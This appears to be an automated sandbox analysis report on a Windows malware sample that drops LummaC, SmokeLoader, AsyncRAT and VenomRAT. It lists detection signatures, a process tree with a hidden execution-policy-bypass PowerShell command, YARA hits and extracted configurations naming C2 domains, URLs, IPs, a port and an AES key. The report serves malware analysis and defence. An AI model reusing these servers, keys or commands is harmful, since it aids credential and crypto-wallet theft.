Edit tour

Windows Analysis Report
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Overview

General Information

Sample name:	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe
Analysis ID:	1483387
MD5:	eccdca95898d2ecce04660fad1209c1d
SHA1:	3be1d8f6d6a75943c1bf7af821d63a1701618f72
SHA256:	7231b59295966497d4a581249d0fd69dcef5de7981d5b3d09039310ca0b875c2
Tags:	exe
Infos:

Detection

LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Check for Windows Defender sandbox

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

System process connects to network (likely due to code injection or exploit)

Yara detected AsyncRAT

Yara detected Go Injector

Yara detected LummaC Stealer

Yara detected SmokeLoader

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Changes memory attributes in foreign processes to executable or writable

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to a pastebin service (likely for C&C)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Deletes itself after installation

Drops VBS files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious ZIP file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file has a writeable .text section

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe" MD5: ECCDCA95898D2ECCE04660FAD1209C1D)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

8EC7.exe (PID: 5440 cmdline: C:\Users\user\AppData\Local\Temp\8EC7.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EF14.exe (PID: 3868 cmdline: C:\Users\user\AppData\Local\Temp\EF14.exe MD5: D3785ED170CDB1F4784D3DFF3A61DAE0)

BitLockerToGo.exe (PID: 1988 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

2D42.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\2D42.exe MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

2D42.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

powershell.exe (PID: 1904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2128 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

vm.exe (PID: 2484 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

cmd.exe (PID: 1892 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

lm.exe (PID: 5724 cmdline: "lm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

WerFault.exe (PID: 3328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 1680 MD5: C31336C1EFC2CCB44B4326EA793040F2)

wscript.exe (PID: 6492 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vm.exe (PID: 2004 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

WerFault.exe (PID: 6104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092 MD5: C31336C1EFC2CCB44B4326EA793040F2)

8EC7.exe (PID: 2248 cmdline: "C:\Users\user\AppData\Local\Temp\8EC7.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8EC7.exe (PID: 5124 cmdline: "C:\Users\user\AppData\Local\Temp\8EC7.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

adjijwj (PID: 7116 cmdline: C:\Users\user\AppData\Roaming\adjijwj MD5: ECCDCA95898D2ECCE04660FAD1209C1D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "pointer--"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}

Threatname: VenomRAT

{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}

Threatname: AsyncRAT

{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\EF14.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2773942055.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2775761675.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2775010312.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2718700898.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000014.00000003.2732789726.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2727794367.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2745784061.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2719069820.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2728924066.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2750455743.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c92e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe64:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000014.00000003.2723831402.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2754315012.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2771030562.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000014.00000003.2730614080.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000014.00000003.2722975569.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2722293127.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2725597045.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2710789516.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2731443501.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000014.00000003.2727021426.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2739250905.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000014.00000003.2752660197.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2723350462.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000014.00000003.2717828329.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2729723839.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2742008984.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2724319284.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c92e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe64:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000014.00000003.2719837852.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
00000014.00000003.2758698968.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2712752600.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2708630118.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2720461285.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
